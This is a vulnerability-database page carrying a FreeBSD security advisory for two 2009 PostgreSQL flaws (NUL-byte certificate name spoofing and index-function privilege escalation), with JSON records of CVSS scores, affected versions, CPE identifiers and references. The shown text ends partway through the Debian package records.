Search...

postgresql -- multiple vulnerabilities

2009-11-20T00:00:00

ID E7BC5600-EAA0-11DE-BD9C-00215C6A37BB
Type freebsd
Reporter FreeBSD
Modified 2009-11-20T00:00:00

Description

PostgreSQL project reports:

PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which (1) allows man-in-the-middle attackers to spoof arbitrary SSL-based PostgreSQL servers via a crafted server certificate issued by a legitimate Certification Authority, and (2) allows remote attackers to bypass intended client-hostname restrictions via a crafted client certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.

PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230.

JSON Vulners Source

Initial Source

{"id": "E7BC5600-EAA0-11DE-BD9C-00215C6A37BB", "bulletinFamily": "unix", "title": "postgresql -- multiple vulnerabilities", "description": "\nPostgreSQL project reports:\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly handle a '\\0' character\n\t in a domain name in the subject's Common Name (CN) field of an\n\t X.509 certificate, which (1) allows man-in-the-middle attackers\n\t to spoof arbitrary SSL-based PostgreSQL servers via a crafted\n\t server certificate issued by a legitimate Certification Authority,\n\t and (2) allows remote attackers to bypass intended client-hostname\n\t restrictions via a crafted client certificate issued by a legitimate\n\t Certification Authority, a related issue to CVE-2009-2408.\n\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly manage session-local\n\t state during execution of an index function by a database\n\t superuser, which allows remote authenticated users to gain\n\t privileges via a table with crafted index functions, as\n\t demonstrated by functions that modify (1) search_path or\n\t (2) a prepared statement, a related issue to CVE-2007-6600\n\t and CVE-2009-3230.\n\n", "published": "2009-11-20T00:00:00", "modified": "2009-11-20T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html", "reporter": "FreeBSD", "references": [], "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "type": "freebsd", "lastseen": "2018-08-31T01:15:23", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4"}], "bulletinFamily": "unix", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nPostgreSQL project reports:\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly handle a '\\0' character\n\t in a domain name in the subject's Common Name (CN) field of an\n\t X.509 certificate, which (1) allows man-in-the-middle attackers\n\t to spoof arbitrary SSL-based PostgreSQL servers via a crafted\n\t server certificate issued by a legitimate Certification Authority,\n\t and (2) allows remote attackers to bypass intended client-hostname\n\t restrictions via a crafted client certificate issued by a legitimate\n\t Certification Authority, a related issue to CVE-2009-2408.\n\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly manage session-local\n\t state during execution of an index function by a database\n\t superuser, which allows remote authenticated users to gain\n\t privileges via a table with crafted index functions, as\n\t demonstrated by functions that modify (1) search_path or\n\t (2) a prepared statement, a related issue to CVE-2007-6600\n\t and CVE-2009-3230.\n\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "cfe5b2e5ae6f1fd520ccacafb8c060e57d7a717c1abe120047e5eb19bb0d92bf", "hashmap": [{"hash": "ec60428f116163768ff76fff3559dcdf", "key": "affectedPackage"}, {"hash": "d57fdf9663b1f21f3d71ab16216e03cd", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "modified"}, {"hash": "e723dd6bd11a0bf4d36aa8e24c09d2a0", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "b23cdf87f527a1184c3bb8d83fab7399", "key": "href"}, {"hash": "42a2d49add379e74e5c6d4f2d78e46aa", "key": "cvelist"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html", "id": "E7BC5600-EAA0-11DE-BD9C-00215C6A37BB", "lastseen": "2018-08-30T19:15:28", "modified": "2009-11-20T00:00:00", "objectVersion": "1.3", "published": "2009-11-20T00:00:00", "references": [], "reporter": "FreeBSD", "title": "postgresql -- multiple vulnerabilities", "type": "freebsd", "viewCount": 1}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:15:28"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4"}], "bulletinFamily": "unix", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "\nPostgreSQL project reports:\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly handle a '\\0' character\n\t in a domain name in the subject's Common Name (CN) field of an\n\t X.509 certificate, which (1) allows man-in-the-middle attackers\n\t to spoof arbitrary SSL-based PostgreSQL servers via a crafted\n\t server certificate issued by a legitimate Certification Authority,\n\t and (2) allows remote attackers to bypass intended client-hostname\n\t restrictions via a crafted client certificate issued by a legitimate\n\t Certification Authority, a related issue to CVE-2009-2408.\n\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly manage session-local\n\t state during execution of an index function by a database\n\t superuser, which allows remote authenticated users to gain\n\t privileges via a table with crafted index functions, as\n\t demonstrated by functions that modify (1) search_path or\n\t (2) a prepared statement, a related issue to CVE-2007-6600\n\t and CVE-2009-3230.\n\n", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "304abb7ee96c02f0d26bcf013105e2e0c753b46368969b98831175a1da81b63a", "hashmap": [{"hash": "ec60428f116163768ff76fff3559dcdf", "key": "affectedPackage"}, {"hash": "d57fdf9663b1f21f3d71ab16216e03cd", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "modified"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "e723dd6bd11a0bf4d36aa8e24c09d2a0", "key": "title"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "b23cdf87f527a1184c3bb8d83fab7399", "key": "href"}, {"hash": "42a2d49add379e74e5c6d4f2d78e46aa", "key": "cvelist"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html", "id": "E7BC5600-EAA0-11DE-BD9C-00215C6A37BB", "lastseen": "2016-09-26T17:24:50", "modified": "2009-11-20T00:00:00", "objectVersion": "1.2", "published": "2009-11-20T00:00:00", "references": [], "reporter": "FreeBSD", "title": "postgresql -- multiple vulnerabilities", "type": "freebsd", "viewCount": 1}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:24:50"}], "edition": 3, "hashmap": [{"key": "affectedPackage", "hash": "ec60428f116163768ff76fff3559dcdf"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "42a2d49add379e74e5c6d4f2d78e46aa"}, {"key": "cvss", "hash": "9acfc3ecd06539a3534549fd05dfad8e"}, {"key": "description", "hash": "d57fdf9663b1f21f3d71ab16216e03cd"}, {"key": "href", "hash": "b23cdf87f527a1184c3bb8d83fab7399"}, {"key": "modified", "hash": "6dd8cfdffb38b85e82a7efd63da62862"}, {"key": "published", "hash": "6dd8cfdffb38b85e82a7efd63da62862"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "e723dd6bd11a0bf4d36aa8e24c09d2a0"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "304abb7ee96c02f0d26bcf013105e2e0c753b46368969b98831175a1da81b63a", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4"}]}

{"cve": [{"lastseen": "2016-09-03T13:03:45", "references": ["http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00007.html", "https://www.redhat.com/archives/fedora-package-announce/2009-December/msg01035.html", "https://www.redhat.com/archives/fedora-package-announce/2009-December/msg01056.html", "http://www.securityfocus.com/bid/37334", "http://marc.info/?l=bugtraq&m=134124585221119&w=2", "http://www.vupen.com/english/advisories/2009/3519", "http://www.postgresql.org/support/security.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:333", "http://www.postgresql.org/docs/current/static/release-7-4-27.html", "http://www.postgresql.org/docs/current/static/release-8-1-19.html", "http://www.postgresql.org/docs/current/static/release-8-2-15.html", "http://www.postgresql.org/docs/current/static/release-8-0-23.html", "http://www.postgresql.org/docs/current/static/release-8-3-9.html", "http://wiki.rpath.com/wiki/Advisories:rPSA-2010-0012", "http://www.postgresql.org/docs/current/static/release-8-4-2.html", "http://www.securityfocus.com/archive/1/archive/1/509917/100/0/threaded", "http://www.securitytracker.com/id?1023325"], "edition": 1, "description": "PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly handle a '\\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which (1) allows man-in-the-middle attackers to spoof arbitrary SSL-based PostgreSQL servers via a crafted server certificate issued by a legitimate Certification Authority, and (2) allows remote attackers to bypass intended client-hostname restrictions via a crafted client certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.", "reporter": "NVD", "published": "2009-12-15T13:30:01", "type": "cve", "title": "CVE-2009-4034", "enchantments": {"score": {"modified": "2016-09-03T13:03:45", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4034"], "scanner": [], "modified": "2016-08-22T22:00:22", "cpe": ["cpe:/a:postgresql:postgresql:7.4.6", "cpe:/a:postgresql:postgresql:8.2.14", "cpe:/a:postgresql:postgresql:8.0.15", "cpe:/a:postgresql:postgresql:8.0.3", "cpe:/a:postgresql:postgresql:8.1.13", "cpe:/a:postgresql:postgresql:7.4.10", "cpe:/a:postgresql:postgresql:8.1.14", "cpe:/a:postgresql:postgresql:8.2.4", "cpe:/a:postgresql:postgresql:8.1.7", "cpe:/a:postgresql:postgresql:8.2", "cpe:/a:postgresql:postgresql:8.1.17", "cpe:/a:postgresql:postgresql:8.3.7", "cpe:/a:postgresql:postgresql:8.1.12", "cpe:/a:postgresql:postgresql:8.3.1", "cpe:/a:postgresql:postgresql:8.0.1", "cpe:/a:postgresql:postgresql:7.4.15", "cpe:/a:postgresql:postgresql:8.0.4", "cpe:/a:postgresql:postgresql:8.0.7", "cpe:/a:postgresql:postgresql:8.1.8", "cpe:/a:postgresql:postgresql:8.2.2", "cpe:/a:postgresql:postgresql:8.2.10", "cpe:/a:postgresql:postgresql:8.2.3", "cpe:/a:postgresql:postgresql:8.2.1", "cpe:/a:postgresql:postgresql:7.4.23", "cpe:/a:postgresql:postgresql:8.0.10", "cpe:/a:postgresql:postgresql:8.1.0", "cpe:/a:postgresql:postgresql:8.0.19", "cpe:/a:postgresql:postgresql:8.0.14", "cpe:/a:postgresql:postgresql:8.2.6", "cpe:/a:postgresql:postgresql:8.2.11", "cpe:/a:postgresql:postgresql:8.1.11", "cpe:/a:postgresql:postgresql:8.0.18", "cpe:/a:postgresql:postgresql:7.4.22", "cpe:/a:postgresql:postgresql:8.3.6", "cpe:/a:postgresql:postgresql:8.2.7", "cpe:/a:postgresql:postgresql:8.2.8", "cpe:/a:postgresql:postgresql:8.0.13", "cpe:/a:postgresql:postgresql:7.4.2", "cpe:/a:postgresql:postgresql:8.3.8", "cpe:/a:postgresql:postgresql:8.2.5", "cpe:/a:postgresql:postgresql:8.1.10", "cpe:/a:postgresql:postgresql:7.4.9", "cpe:/a:postgresql:postgresql:8.0.22", "cpe:/a:postgresql:postgresql:8.0.2", "cpe:/a:postgresql:postgresql:8.1.18", "cpe:/a:postgresql:postgresql:8.1.16", "cpe:/a:postgresql:postgresql:8.1.1", "cpe:/a:postgresql:postgresql:7.4.19", "cpe:/a:postgresql:postgresql:7.4.1", "cpe:/a:postgresql:postgresql:7.4.20", "cpe:/a:postgresql:postgresql:7.4.13", "cpe:/a:postgresql:postgresql:7.4.21", "cpe:/a:postgresql:postgresql:8.1.4", "cpe:/a:postgresql:postgresql:8.1.5", "cpe:/a:postgresql:postgresql:8.1.6", "cpe:/a:postgresql:postgresql:7.4.26", "cpe:/a:postgresql:postgresql:7.4.7", "cpe:/a:postgresql:postgresql:7.4.18", "cpe:/a:postgresql:postgresql:8.0.17", "cpe:/a:postgresql:postgresql:7.4.4", "cpe:/a:postgresql:postgresql:8.1.9", "cpe:/a:postgresql:postgresql:8.2.13", "cpe:/a:postgresql:postgresql:8.0.12", "cpe:/a:postgresql:postgresql:7.4.17", "cpe:/a:postgresql:postgresql:8.3.3", "cpe:/a:postgresql:postgresql:8.1.15", "cpe:/a:postgresql:postgresql:8.0.21", "cpe:/a:postgresql:postgresql:7.4.12", "cpe:/a:postgresql:postgresql:8.0.16", "cpe:/a:postgresql:postgresql:8.0.8", "cpe:/a:postgresql:postgresql:8.2.12", "cpe:/a:postgresql:postgresql:8.0.5", "cpe:/a:postgresql:postgresql:8.0.6", "cpe:/a:postgresql:postgresql:8.2.9", "cpe:/a:postgresql:postgresql:7.4.25", "cpe:/a:postgresql:postgresql:8.3.4", "cpe:/a:postgresql:postgresql:8.1.2", "cpe:/a:postgresql:postgresql:7.4.16", "cpe:/a:postgresql:postgresql:7.4.5", "cpe:/a:postgresql:postgresql:7.4.8", "cpe:/a:postgresql:postgresql:8.3.2", "cpe:/a:postgresql:postgresql:8.1.3", "cpe:/a:postgresql:postgresql:8.0.20", "cpe:/a:postgresql:postgresql:7.4.3", "cpe:/a:postgresql:postgresql:7.4.24", "cpe:/a:postgresql:postgresql:7.4.11", "cpe:/a:postgresql:postgresql:8.0.0", "cpe:/a:postgresql:postgresql:7.4.14", "cpe:/a:postgresql:postgresql:8.0.9", "cpe:/a:postgresql:postgresql:8.0.11", "cpe:/a:postgresql:postgresql:8.3.5", "cpe:/a:postgresql:postgresql:8.4.1"], "id": "CVE-2009-4034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4034", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:43", "references": ["http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00007.html", "https://bugzilla.redhat.com/show_bug.cgi?id=546321", "https://www.redhat.com/archives/fedora-package-announce/2009-December/msg01035.html", "https://www.redhat.com/archives/fedora-package-announce/2009-December/msg01056.html", "http://www.vupen.com/english/advisories/2010/1197", "http://marc.info/?l=bugtraq&m=134124585221119&w=2", "http://www.vupen.com/english/advisories/2009/3519", "http://www.postgresql.org/support/security.html", "http://www.securityfocus.com/bid/37333", "http://www.redhat.com/support/errata/RHSA-2010-0428.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:333", "http://www.postgresql.org/docs/current/static/release-7-4-27.html", "http://www.postgresql.org/docs/current/static/release-8-1-19.html", "http://www.redhat.com/support/errata/RHSA-2010-0429.html", "http://www.postgresql.org/docs/current/static/release-8-2-15.html", "http://www.postgresql.org/docs/current/static/release-8-0-23.html", "http://www.postgresql.org/docs/current/static/release-8-3-9.html", "http://www.securitytracker.com/id?1023326", "http://www.redhat.com/support/errata/RHSA-2010-0427.html", "http://wiki.rpath.com/wiki/Advisories:rPSA-2010-0012", "http://www.postgresql.org/docs/current/static/release-8-4-2.html", "http://www.securityfocus.com/archive/1/archive/1/509917/100/0/threaded"], "description": "PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230.", "edition": 2, "reporter": "NVD", "published": "2009-12-15T13:30:01", "title": "CVE-2009-4136", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:43", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9358", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9358"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4136"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9358", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9358"}], "modified": "2017-09-18T21:29:55", "cpe": ["cpe:/a:postgresql:postgresql:7.4.6", "cpe:/a:postgresql:postgresql:8.2.14", "cpe:/a:postgresql:postgresql:8.0.15", "cpe:/a:postgresql:postgresql:8.0.3", "cpe:/a:postgresql:postgresql:8.1.13", "cpe:/a:postgresql:postgresql:7.4.10", "cpe:/a:postgresql:postgresql:8.1.14", "cpe:/a:postgresql:postgresql:8.2.4", "cpe:/a:postgresql:postgresql:8.1.7", "cpe:/a:postgresql:postgresql:8.2", "cpe:/a:postgresql:postgresql:8.1.17", "cpe:/a:postgresql:postgresql:8.3.7", "cpe:/a:postgresql:postgresql:8.1.12", "cpe:/a:postgresql:postgresql:8.3.1", "cpe:/a:postgresql:postgresql:8.0.1", "cpe:/a:postgresql:postgresql:7.4.15", "cpe:/a:postgresql:postgresql:8.0.4", "cpe:/a:postgresql:postgresql:8.0.7", "cpe:/a:postgresql:postgresql:8.1.8", "cpe:/a:postgresql:postgresql:8.2.2", "cpe:/a:postgresql:postgresql:8.2.10", "cpe:/a:postgresql:postgresql:8.2.3", "cpe:/a:postgresql:postgresql:8.2.1", "cpe:/a:postgresql:postgresql:7.4.23", "cpe:/a:postgresql:postgresql:8.0.10", "cpe:/a:postgresql:postgresql:8.1.0", "cpe:/a:postgresql:postgresql:8.0.19", "cpe:/a:postgresql:postgresql:8.0.14", "cpe:/a:postgresql:postgresql:8.2.6", "cpe:/a:postgresql:postgresql:8.2.11", "cpe:/a:postgresql:postgresql:8.1.11", "cpe:/a:postgresql:postgresql:8.0.18", "cpe:/a:postgresql:postgresql:7.4.22", "cpe:/a:postgresql:postgresql:8.3.6", "cpe:/a:postgresql:postgresql:8.2.7", "cpe:/a:postgresql:postgresql:8.2.8", "cpe:/a:postgresql:postgresql:8.0.13", "cpe:/a:postgresql:postgresql:7.4.2", "cpe:/a:postgresql:postgresql:8.3.8", "cpe:/a:postgresql:postgresql:8.2.5", "cpe:/a:postgresql:postgresql:8.1.10", "cpe:/a:postgresql:postgresql:7.4.9", "cpe:/a:postgresql:postgresql:8.0.22", "cpe:/a:postgresql:postgresql:8.0.2", "cpe:/a:postgresql:postgresql:8.1.18", "cpe:/a:postgresql:postgresql:8.1.16", "cpe:/a:postgresql:postgresql:8.1.1", "cpe:/a:postgresql:postgresql:7.4.19", "cpe:/a:postgresql:postgresql:7.4.1", "cpe:/a:postgresql:postgresql:7.4.20", "cpe:/a:postgresql:postgresql:7.4.13", "cpe:/a:postgresql:postgresql:7.4.21", "cpe:/a:postgresql:postgresql:8.1.4", "cpe:/a:postgresql:postgresql:8.1.5", "cpe:/a:postgresql:postgresql:8.1.6", "cpe:/a:postgresql:postgresql:7.4.26", "cpe:/a:postgresql:postgresql:7.4.7", "cpe:/a:postgresql:postgresql:7.4.18", "cpe:/a:postgresql:postgresql:8.0.17", "cpe:/a:postgresql:postgresql:7.4.4", "cpe:/a:postgresql:postgresql:8.1.9", "cpe:/a:postgresql:postgresql:8.2.13", "cpe:/a:postgresql:postgresql:8.0.12", "cpe:/a:postgresql:postgresql:7.4.17", "cpe:/a:postgresql:postgresql:8.3.3", "cpe:/a:postgresql:postgresql:8.1.15", "cpe:/a:postgresql:postgresql:8.0.21", "cpe:/a:postgresql:postgresql:7.4.12", "cpe:/a:postgresql:postgresql:8.0.16", "cpe:/a:postgresql:postgresql:8.0.8", "cpe:/a:postgresql:postgresql:8.2.12", "cpe:/a:postgresql:postgresql:8.0.5", "cpe:/a:postgresql:postgresql:8.0.6", "cpe:/a:postgresql:postgresql:8.2.9", "cpe:/a:postgresql:postgresql:7.4.25", "cpe:/a:postgresql:postgresql:8.3.4", "cpe:/a:postgresql:postgresql:8.1.2", "cpe:/a:postgresql:postgresql:7.4.16", "cpe:/a:postgresql:postgresql:7.4.5", "cpe:/a:postgresql:postgresql:7.4.8", "cpe:/a:postgresql:postgresql:8.3.2", "cpe:/a:postgresql:postgresql:8.1.3", "cpe:/a:postgresql:postgresql:8.0.20", "cpe:/a:postgresql:postgresql:7.4.3", "cpe:/a:postgresql:postgresql:7.4.24", "cpe:/a:postgresql:postgresql:7.4.11", "cpe:/a:postgresql:postgresql:8.0.0", "cpe:/a:postgresql:postgresql:7.4.14", "cpe:/a:postgresql:postgresql:8.0.9", "cpe:/a:postgresql:postgresql:8.0.11", "cpe:/a:postgresql:postgresql:8.3.5", "cpe:/a:postgresql:postgresql:8.4.1"], "id": "CVE-2009-4136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4136", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "postgresql": [{"lastseen": "2018-02-15T15:10:41", "references": [], "description": "NULL Bytes in SSL Certificates can be used to falsify client or server authentication. This only affects users who have SSL enabled, perform certificate name validation or client certificate authentication, and where the Certificate Authority (CA) has been tricked into issuing invalid certificates. The use of a CA that can be trusted to always issue valid certificates is recommended to ensure you are not vulnerable to this issue.", "edition": 1, "reporter": "PostgreSQL Global Development Group", "published": "2009-12-15T13:30:01", "type": "postgresql", "title": "Vulnerability in core server (CVE-2009-4034)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [{"name": "PostgreSQL", "version": "7.4.27", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.4.2", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.0.23", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.2.15", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.1.19", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.3.9", "operator": "lt"}], "bulletinFamily": "software", "cvelist": ["CVE-2009-4034"], "modified": "2009-12-15T13:30:01", "href": "https://www.postgresql.org/support/security/8.4/", "id": "POSTGRESQL:CVE-2009-4034", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-15T15:10:41", "references": [], "description": "Privilege escalation via changing session state in an index function. This closes a corner case related to vulnerabilities CVE-2009-3230 and CVE-2007-6600 (below).", "edition": 1, "reporter": "PostgreSQL Global Development Group", "published": "2009-12-15T13:30:01", "type": "postgresql", "title": "Vulnerability in core server (CVE-2009-4136)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "PostgreSQL", "version": "7.4.27", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.4.2", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.0.23", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.2.15", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.1.19", "operator": "lt"}, {"name": "PostgreSQL", "version": "8.3.9", "operator": "lt"}], "bulletinFamily": "software", "cvelist": ["CVE-2009-4136"], "modified": "2009-12-15T13:30:01", "href": "https://www.postgresql.org/support/security/8.4/", "id": "POSTGRESQL:CVE-2009-4136", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2016-09-02T18:23:19", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "libpgtypes3_8.3.9-0lenny1_powerpc.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "x86-64", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_amd64.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "libpq-dev_8.3.9-0lenny1_armel.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_mips.deb", "packageName": 